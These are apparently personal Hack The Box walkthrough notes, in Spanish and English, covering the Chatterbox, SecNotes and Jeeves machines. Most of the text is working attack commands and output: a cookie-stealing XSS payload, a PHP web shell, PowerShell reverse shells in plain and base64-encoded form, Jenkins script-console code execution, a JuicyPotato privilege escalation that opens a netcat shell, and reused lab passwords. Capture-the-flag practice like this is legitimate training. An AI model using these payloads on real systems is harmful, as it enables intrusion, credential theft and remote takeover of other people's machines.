Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC [*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF [*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF [*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [M]MS14-060: Vulnerability in Windows OLE Could Allow Remote Code Execution (3000869) - Important [*] http://www.exploit-db.com/exploits/35055/ -- Windows OLE - Remote Code Execution 'Sandworm' Exploit (MS14-060), PoC [*] http://www.exploit-db.com/exploits/35020/ -- MS14-060 Microsoft Windows OLE Package Manager Code Execution, MSF [*] [E]MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important [*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC [*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC [*] [E]MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important [*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC [*] [*]done ``` ```bash C:\Windows\system32>netstat -ano netstat -ano Active Connections Proto Local Address Foreign Address State PID TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 664 TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4 TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 352 TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 716 TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 912 TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 456 TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 968 TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 464 TCP 10.10.10.74:139 0.0.0.0:0 LISTENING 4 TCP 10.10.10.74:9255 0.0.0.0:0 LISTENING 788 TCP 10.10.10.74:9256 0.0.0.0:0 LISTENING 788 TCP 10.10.10.74:49158 10.10.14.3:8877 ESTABLISHED 788 TCP [::]:135 [::]:0 LISTENING 664 TCP [::]:445 [::]:0 LISTENING 4 TCP [::]:49152 [::]:0 LISTENING 352 TCP [::]:49153 [::]:0 LISTENING 716 TCP [::]:49154 [::]:0 LISTENING 912 TCP [::]:49155 [::]:0 LISTENING 456 TCP [::]:49156 [::]:0 LISTENING 968 TCP [::]:49157 [::]:0 LISTENING 464 UDP 0.0.0.0:123 *:* 872 UDP 0.0.0.0:500 *:* 912 UDP 0.0.0.0:4500 *:* 912 UDP 0.0.0.0:5355 *:* 1104 UDP 0.0.0.0:57992 *:* 1104 UDP 0.0.0.0:58405 *:* 1104 UDP 10.10.10.74:137 *:* 4 UDP 10.10.10.74:138 *:* 4 UDP 10.10.10.74:1900 *:* 3352 UDP 10.10.10.74:9256 *:* 788 UDP 10.10.10.74:58819 *:* 3352 UDP 127.0.0.1:1900 *:* 3352 UDP 127.0.0.1:58820 *:* 3352 UDP [::]:123 *:* 872 UDP [::]:500 *:* 912 UDP [::]:4500 *:* 912 UDP [::1]:1900 *:* 3352 UDP [::1]:58818 *:* 3352 ``` A buscar passwords en el registro: ```Bash C:\Users\Alfred\Desktop>reg query HKLM /f password /t REG_SZ /s reg query HKLM /f password /t REG_SZ /s HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\ProgID (Default) REG_SZ IAS.ChangePassword.1 HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{6BC0989B-0CE6-11D1-BAAE-00C04FC2E20D}\VersionIndependentProgID (Default) REG_SZ IAS.ChangePassword [...] HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon DefaultPassword REG_SZ Welcome1! [...] End of search: 49 match(es) found. ``` Tiene pinta de password, no? ```bash C:\Users\Alfred\Desktop>reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon ReportBootOk REG_SZ 1 Shell REG_SZ explorer.exe PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16} Userinit REG_SZ C:\Windows\system32\userinit.exe, VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile AutoRestartShell REG_DWORD 0x1 Background REG_SZ 0 0 0 CachedLogonsCount REG_SZ 10 DebugServerCommand REG_SZ no ForceUnlockLogon REG_DWORD 0x0 LegalNoticeCaption REG_SZ LegalNoticeText REG_SZ PasswordExpiryWarning REG_DWORD 0x5 PowerdownAfterShutdown REG_SZ 0 ShutdownWithoutLogon REG_SZ 0 WinStationsDisabled REG_SZ 0 DisableCAD REG_DWORD 0x1 scremoveoption REG_SZ 0 ShutdownFlags REG_DWORD 0x11 DefaultDomainName REG_SZ DefaultUserName REG_SZ Alfred AutoAdminLogon REG_SZ 1 DefaultPassword REG_SZ Welcome1! HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\GPExtensions HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\AutoLogonChecked ``` Pues parece que funciona: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/chatterbox] └─$ smbclient --user=alfred -L 10.10.10.74 Password for [WORKGROUP\alfred]: <- La correcta Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ┌──(aml㉿kali)-[~/HTB/Retired/chatterbox] └─$ smbclient --user=alfred -L 10.10.10.74 Password for [WORKGROUP\alfred]: <- La incorrecta session setup failed: NT_STATUS_LOGON_FAILURE ``` Y la misma passw funciona con "Administrator": ```bash ┌──(aml㉿kali)-[~/HTB/Retired/chatterbox] └─$ smbclient --user=Administrator -L 10.10.10.74 Password for [WORKGROUP\Administrator]: Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.74 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` Crackmapexec nos permite lanzar comandos sabiendo las credenciales, gracias al puerto 445 :) ```bash ┌──(aml㉿kali)-[/usr/share/windows-resources/binaries] └─$ crackmapexec smb 10.10.10.74 -u Administrator -p "Welcome1\!" -x "type C:\Users\Administrator\Desktop\root.txt" SMB 10.10.10.74 445 CHATTERBOX [*] Windows 7 Professional 7601 Service Pack 1 (name:CHATTERBOX) (domain:Chatterbox) (signing:False) (SMBv1:True) SMB 10.10.10.74 445 CHATTERBOX [+] Chatterbox\Administrator:Welcome1! (Pwn3d!) SMB 10.10.10.74 445 CHATTERBOX [+] Executed command SMB 10.10.10.74 445 CHATTERBOX f9eb4383d7c349fbad346894bb620e8d ``` Otra forma es con winexe: ```bash ┌──(aml㉿kali)-[/usr/share/windows-resources/binaries] └─$ winexe -U Administrator%Welcome1! //10.10.10.74 "cmd.exe" Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami whoami chatterbox\administrator ``` ## Windows Subsystem Linux (WSL)- SecNotes ### Access to the machine nmap: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/SecNotes] └─$ sudo nmap -T5 -A -p80,445,8808 10.10.10.97 Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-14 21:48 CET Nmap scan report for 10.10.10.97 Host is up (0.070s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 | http-methods: |_ Potentially risky methods: TRACE | http-title: Secure Notes - Login |_Requested resource was login.php 445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB) 8808/tcp open http Microsoft IIS httpd 10.0 |_http-server-header: Microsoft-IIS/10.0 |_http-title: IIS Windows | http-methods: |_ Potentially risky methods: TRACE Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows XP|7 (89%) OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_7 Aggressive OS guesses: Microsoft Windows XP SP3 (89%), Microsoft Windows XP SP2 (86%), Microsoft Windows 7 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: mean: 2h40m01s, deviation: 4h37m09s, median: 0s | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required | smb2-time: | date: 2022-11-14T20:49:13 |_ start_date: N/A | smb-security-mode: | account_used: <blank> | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb-os-discovery: | OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3) | OS CPE: cpe:/o:microsoft:windows_10::- | Computer name: SECNOTES | NetBIOS computer name: SECNOTES\x00 | Workgroup: HTB\x00 |_ System time: 2022-11-14T12:49:14-08:00 TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 75.95 ms 10.10.14.1 2 77.70 ms 10.10.10.97 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 83.38 seconds ``` There's a website with a login in port 80. After registered, there's a "notepad" when you can save notes. Also we have an username: tyler@secnotes.htb and we can send him a message using contact form. First note created. It allow to use html code. Second note created. Store XSS. Thirth note: "alert(document.cookie)" works. So, our code will be: ```javascript <script>var i=new Image;i.src="http://10.10.14.3/?"+document.cookie;</script> ``` Sent XSS but don't receive response... La sessid no cambia tras logout. Ok, la rabbithole estaba en el register. Si nos registramos con un username **' or '1'='1**, al hacer login después, veremos todas las notas de todos los usuarios. Entre esas notas, hay una llamada "new site": ``` \\secnotes.htb\new-site tyler / 92g!mA8BGjOirkL%OG*& ``` And: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/SecNotes] └─$ rpcclient -U "Tyler" secnotes.htb Password for [WORKGROUP\Tyler]: rpcclient $> getusername Account Name: tyler, Authority Name: SECNOTES rpcclient $> ``` ```bash ┌──(aml㉿kali)-[~/HTB/Retired/SecNotes] └─$ smbmap -R -u Tyler -p "92g\!mA8BGjOirkL%OG*&" -H 10.10.10.97 [+] IP: 10.10.10.97:445 Name: secnotes.htb Disk Permissions Comment ---- ----------- ------- ADMIN$ NO ACCESS Remote Admin C$ NO ACCESS Default share IPC$ READ ONLY Remote IPC .\IPC$\* fr--r--r-- 3 Sun Dec 31 23:45:16 1600 InitShutdown fr--r--r-- 4 Sun Dec 31 23:45:16 1600 lsass fr--r--r-- 3 Sun Dec 31 23:45:16 1600 ntsvcs fr--r--r-- 3 Sun Dec 31 23:45:16 1600 scerpc fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-374-0 fr--r--r-- 3 Sun Dec 31 23:45:16 1600 epmapper fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-1f0-0 fr--r--r-- 3 Sun Dec 31 23:45:16 1600 LSM_API_service fr--r--r-- 3 Sun Dec 31 23:45:16 1600 eventlog fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-424-0 fr--r--r-- 3 Sun Dec 31 23:45:16 1600 atsvc fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-54c-0 fr--r--r-- 3 Sun Dec 31 23:45:16 1600 spoolss fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-6a8-0 fr--r--r-- 4 Sun Dec 31 23:45:16 1600 wkssvc fr--r--r-- 3 Sun Dec 31 23:45:16 1600 trkwks fr--r--r-- 1 Sun Dec 31 23:45:16 1600 mysqld2584_pipe fr--r--r-- 3 Sun Dec 31 23:45:16 1600 tapsrv fr--r--r-- 4 Sun Dec 31 23:45:16 1600 srvsvc fr--r--r-- 1 Sun Dec 31 23:45:16 1600 vgauth-service fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-278-0 fr--r--r-- 3 Sun Dec 31 23:45:16 1600 ROUTER fr--r--r-- 1 Sun Dec 31 23:45:16 1600 Winsock2\CatalogChangeListener-280-0 fr--r--r-- 3 Sun Dec 31 23:45:16 1600 browser fr--r--r-- 3 Sun Dec 31 23:45:16 1600 MsFteWds fr--r--r-- 1 Sun Dec 31 23:45:16 1600 SearchTextHarvester fr--r--r-- 1 Sun Dec 31 23:45:16 1600 PSHost.133129316245153885.4788.DefaultAppDomain.powershell fr--r--r-- 1 Sun Dec 31 23:45:16 1600 PSHost.133129316238238397.508.DefaultAppDomain.powershell fr--r--r-- 1 Sun Dec 31 23:45:16 1600 iisipmb2a07fbb-a3d2-408f-98ab-15d046feb474 fr--r--r-- 1 Sun Dec 31 23:45:16 1600 iislogpipe6836445c-e406-4875-895b-f9edadb20a45 fr--r--r-- 1 Sun Dec 31 23:45:16 1600 PIPE_EVENTROOT\CIMV2SCM EVENT PROVIDER fr--r--r-- 3 Sun Dec 31 23:45:16 1600 W32TIME_ALT fr--r--r-- 1 Sun Dec 31 23:45:16 1600 iisipm6f1c5db5-e853-47af-9a3f-61f2d4809197 fr--r--r-- 1 Sun Dec 31 23:45:16 1600 iislogpipe3ff7e51a-b23f-4228-be97-0cf8c2aa25af fr--r--r-- 1 Sun Dec 31 23:45:16 1600 IISFCGI-c80d09e6-0aeb-4373-a643-4d82ab00a636 new-site READ, WRITE .\new-site\* dr--r--r-- 0 Tue Nov 15 09:25:13 2022 . dr--r--r-- 0 Tue Nov 15 09:25:13 2022 .. fr--r--r-- 696 Thu Jun 21 22:15:36 2018 iisstart.htm fr--r--r-- 98757 Thu Jun 21 22:15:38 2018 iisstart.png ``` Uploaded revshell.php ```php <html> <body> <form method="GET" name="<?php echo basename($_SERVER['PHP_SELF']); ?>"> <input type="TEXT" name="cmd" id="cmd" size="80"> <input type="SUBMIT" value="Execute"> </form> <pre> <?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?> </pre> </body> <script>document.getElementById("cmd").focus();</script> </html> ``` ```bash ┌──(aml㉿kali)-[~/HTB/Retired/SecNotes] └─$ smbclient -U Tyler //10.10.10.97/new-site Password for [WORKGROUP\Tyler]: Try "help" to get a list of possible commands. smb: \> list 0: server=10.10.10.97, share=new-site smb: \> ls . D 0 Tue Nov 15 09:25:13 2022 .. D 0 Tue Nov 15 09:25:13 2022 iisstart.htm A 696 Thu Jun 21 17:26:03 2018 iisstart.png A 98757 Thu Jun 21 17:26:03 2018 7736063 blocks of size 4096. 3388138 blocks available smb: \> put revshell.php putting file revshell.php as \revshell.php (24,2 kb/s) (average 24,2 kb/s) smb: \> ``` Sent this payload over the php page for having a good revshell in port 8888: ```cmd powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.14.4',8888);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()" ``` And: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/SecNotes] └─$ nc -nlvp 8888 listening on [any] 8888 ... connect to [10.10.14.4] from (UNKNOWN) [10.10.10.97] 57887 PS C:\inetpub\new-site> whoami secnotes\tyler ```` ```bash C:\inetpub\new-site>sc query windefend sc query windefend SERVICE_NAME: windefend TYPE : 10 WIN32_OWN_PROCESS STATE : 4 RUNNING (STOPPABLE, NOT_PAUSABLE, ACCEPTS_SHUTDOWN) WIN32_EXIT_CODE : 0 (0x0) SERVICE_EXIT_CODE : 0 (0x0) CHECKPOINT : 0x0 WAIT_HINT : 0x0 ``` ```bash C:\inetpub\new-site>where /R c:\windows bash.exe where /R c:\windows bash.exe c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe C:\inetpub\new-site>where /R c:\windows wsl.exe where /R c:\windows wsl.exe c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe ``` Vaya qué chorprecha! ```bash C:\inetpub\new-site>c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe whoami c:\Windows\WinSxS\amd64_microsoft-windows-lxss-wsl_31bf3856ad364e35_10.0.17134.1_none_686f10b5380a84cf\wsl.exe whoami root ``` Nos montamos en la bash del wsl ```bash C:\inetpub\new-site>c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe c:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe mesg: ttyname failed: Inappropriate ioctl for device whoami root python -c 'import pty;pty.spawn("/bin/bash")' root@SECNOTES:~# whoami whoami root root@SECNOTES:~# hostname hostname SECNOTES root@SECNOTES:~# ``` Wo!! ```bash root@SECNOTES:~# history history 1 cd /mnt/c/ 2 ls 3 cd Users/ 4 cd / 5 cd ~ 6 ls 7 pwd 8 mkdir filesystem 9 mount //127.0.0.1/c$ filesystem/ 10 sudo apt install cifs-utils 11 mount //127.0.0.1/c$ filesystem/ 12 mount //127.0.0.1/c$ filesystem/ -o user=administrator 13 cat /proc/filesystems 14 sudo modprobe cifs 15 smbclient 16 apt install smbclient 17 smbclient 18 smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\127.0.0.1\\c$ 19 > .bash_history 20 less .bash_history 21 whoami ``` Y funsionó. ```bash ┌──(aml㉿kali)-[~/HTB/Retired/SecNotes] └─$ smbclient -U 'administrator%u6!4ZwgwOM#^OBf#Nwnh' \\\\10.10.10.97\\c$ Try "help" to get a list of possible commands. smb: \> ls $Recycle.Bin DHS 0 Fri Jun 22 00:24:29 2018 bootmgr AHSR 395268 Fri Jul 10 13:00:31 2015 BOOTNXT AHS 1 Fri Jul 10 13:00:31 2015 Config.Msi DHS 0 Mon Jan 25 16:24:50 2021 Distros D 0 Fri Jun 22 00:07:52 2018 Documents and Settings DHSrn 0 Fri Jul 10 14:21:38 2015 inetpub D 0 Fri Jun 22 03:47:33 2018 Microsoft D 0 Fri Jun 22 23:09:10 2018 pagefile.sys AHS 738197504 Mon Nov 14 21:32:51 2022 PerfLogs D 0 Thu Apr 12 01:38:20 2018 php7 D 0 Thu Jun 21 17:15:24 2018 Program Files DR 0 Tue Jan 26 11:39:51 2021 Program Files (x86) DR 0 Tue Jan 26 11:38:26 2021 ProgramData DH 0 Sun Aug 19 23:56:49 2018 Recovery DHSn 0 Thu Jun 21 23:52:17 2018 swapfile.sys AHS 16777216 Mon Nov 14 21:32:52 2022 System Volume Information DHS 0 Thu Jun 21 23:53:13 2018 Ubuntu.zip A 201749452 Fri Jun 22 00:07:28 2018 Users DR 0 Fri Jun 22 00:00:39 2018 Windows D 0 Tue Jan 26 11:38:46 2021 7736063 blocks of size 4096. 3384441 blocks available smb: \> ``` Otra forma: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/SecNotes] └─$ impacket-psexec administrator:'u6!4ZwgwOM#^OBf#Nwnh'@10.10.10.97 Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation [*] Requesting shares on 10.10.10.97..... [*] Found writable share ADMIN$ [*] Uploading file YcZOqIUv.exe [*] Opening SVCManager on 10.10.10.97..... [*] Creating service Vnbo on 10.10.10.97..... [*] Starting service Vnbo..... [!] Press help for extra shell commands Microsoft Windows [Version 10.0.17134.228] (c) 2018 Microsoft Corporation. All rights reserved. C:\WINDOWS\system32> whoami nt authority\system C:\WINDOWS\system32> hostname SECNOTES ``` wmiexe, smbexec son otras formas de tener consola. ## Impersonation and Potato Attacks- Jeeves ### Access to the machine Tiene un buscador llamado Jeeves en el 80. Cuando buscas algo te devuelve lo que parece un error, pero es una captura de pantalla (http://10.10.10.63/jeeves.PNG). Otro servidor web en el 50000 que devuelve un 404 y firma con "Powered by Jetty:// 9.4.z-SNAPSHOT" nmap: ```bash ┌──(aml㉿kali)-[~/HTB/Retired/Jeeves] └─$ sudo nmap -A -T5 -p80,135,445,50000 10.10.10.63 -oN nmap.out Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-15 17:13 CET Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan NSE Timing: About 99.82% done; ETC: 17:14 (0:00:00 remaining) Nmap scan report for 10.10.10.63 Host is up (0.052s latency). PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 |_http-title: Ask Jeeves | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000/tcp open http Jetty 9.4.z-SNAPSHOT |_http-title: Error 404 Not Found |_http-server-header: Jetty(9.4.z-SNAPSHOT) Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port Device type: general purpose Running (JUST GUESSING): Microsoft Windows 2008|10|2016|7|Vista (90%), FreeBSD 6.X (86%) OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_10 cpe:/o:freebsd:freebsd:6.2 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows_server_2016 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1 Aggressive OS guesses: Microsoft Windows Server 2008 R2 (90%), Microsoft Windows 10 1511 - 1607 (87%), FreeBSD 6.2-RELEASE (86%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (85%), Microsoft Windows Server 2016 (85%), Microsoft Windows 7 (85%), Microsoft Windows 7 Professional or Windows 8 (85%), Microsoft Windows 7 SP1 or Windows Server 2008 SP2 or 2008 R2 SP1 (85%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (85%), Microsoft Windows Vista SP2 (85%) No exact OS matches for host (test conditions non-ideal). Network Distance: 2 hops Service Info: Host: JEEVES; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2022-11-15T21:14:26 |_ start_date: 2022-11-15T21:10:23 | smb2-security-mode: | 3.1.1: |_ Message signing enabled but not required |_clock-skew: mean: 4h59m59s, deviation: 0s, median: 4h59m59s TRACEROUTE (using port 80/tcp) HOP RTT ADDRESS 1 50.90 ms 10.10.14.1 2 51.02 ms 10.10.10.63 OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 77.94 seconds ``` wfuzz (que dirb no va bien con diccionarios grandes): ```bash ┌──(aml㉿kali)-[~] └─$ wfuzz -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hc 404 http://10.10.10.63:50000/FUZZ /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information. ******************************************************** * Wfuzz 3.1.0 - The Web Fuzzer * ******************************************************** Target: http://10.10.10.63:50000/FUZZ Total requests: 220560 ===================================================================== ID Response Lines Word Chars Payload ===================================================================== 000041607: 302 0 L 0 W 0 Ch "askjeeves" ``` http://10.10.10.63:50000/askjeeves/ Qué guesser deverdá! Es un jenkins, let's RCE it! Vamos a http://10.10.10.63:50000/askjeeves/script ```bash def var = "C:\\Windows\\System32\\whoami.exe" var.execute().text > Result: jeeves\kohsuke ``` ```bash def var = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c "ls"' var.execute().text > Result: Directory: C:\Users\Administrator\.jenkins Mode LastWriteTime Length Name ---- ------------- ------ ---- d----- 11/3/2017 10:33 PM jobs d----- 11/3/2017 10:33 PM logs d----- 11/3/2017 10:33 PM nodes d----- 11/3/2017 10:44 PM plugins [...] ``` Y la revshell ```bash def var = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA0AC4ANQAiACwAOAA4ADcANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=' var.execute().text ``` ```bash ┌──(aml㉿kali)-[~/HTB/Retired/Jeeves] └─$ nc -nlvp 8877 listening on [any] 8877 ... connect to [10.10.14.5] from (UNKNOWN) [10.10.10.63] 49676 whoami jeeves\kohsuke PS C:\Users\Administrator\.jenkins> hostname Jeeves PS C:\Users\Administrator\.jenkins> ``` ### PrivEsc w/ Impersonation Privileges ```bash PS C:\Users\Administrator\.jenkins> whoami /priv PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeShutdownPrivilege Shut down the system Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeUndockPrivilege Remove computer from docking station Disabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled SeTimeZonePrivilege Change the time zone Disabled ``` Descargado juicypotato desde https://github.com/ohpe/juicy-potato/releases/tag/v0.1 Subido desde Jenkins con: ```bash def var = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -c "Invoke-WebRequest -Uri http://10.10.14.5:8081/jp.exe -OutFile jp.exe"' var.execute().text ```` Subido también nc.exe y GetCLSID.ps1 (https://raw.githubusercontent.com/ohpe/juicy-potato/master/CLSID/GetCLSID.ps1) Es un w10 pro según systeminfo. Desde https://ohpe.it/juicy-potato/CLSID/Windows_10_Pro/ obtenemos un CLSID. Por ejemplo el "{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}" de TrustedInstaller. ```bash PS C:\Users\Administrator\.jenkins> . ./jp.exe -l 1337 -p c:\Windows\System32\cmd.exe -t * -c "{8F5DF053-3013-4dd8-B5F4-88214E81C0CF}" -z {8F5DF053-3013-4dd8-B5F4-88214E81C0CF};NT AUTHORITY\SYSTEM ```` ```bash ./jp.exe -l 1337 -c '{03ca98d6-ff5d-49b8-abc6-03dd84127020}' -p c:\windows\system32\cmd.exe -a "/c c:\users\administrator\.jenkins\nc.exe -e cmd.exe 10.10.14.5 9999" -t * ``` Y funciona Pero la flag de root te dice que está en otro sitio... `find /n "root"` está tardando demasiado... ## RunAs - Access ### Enumeration Puertos 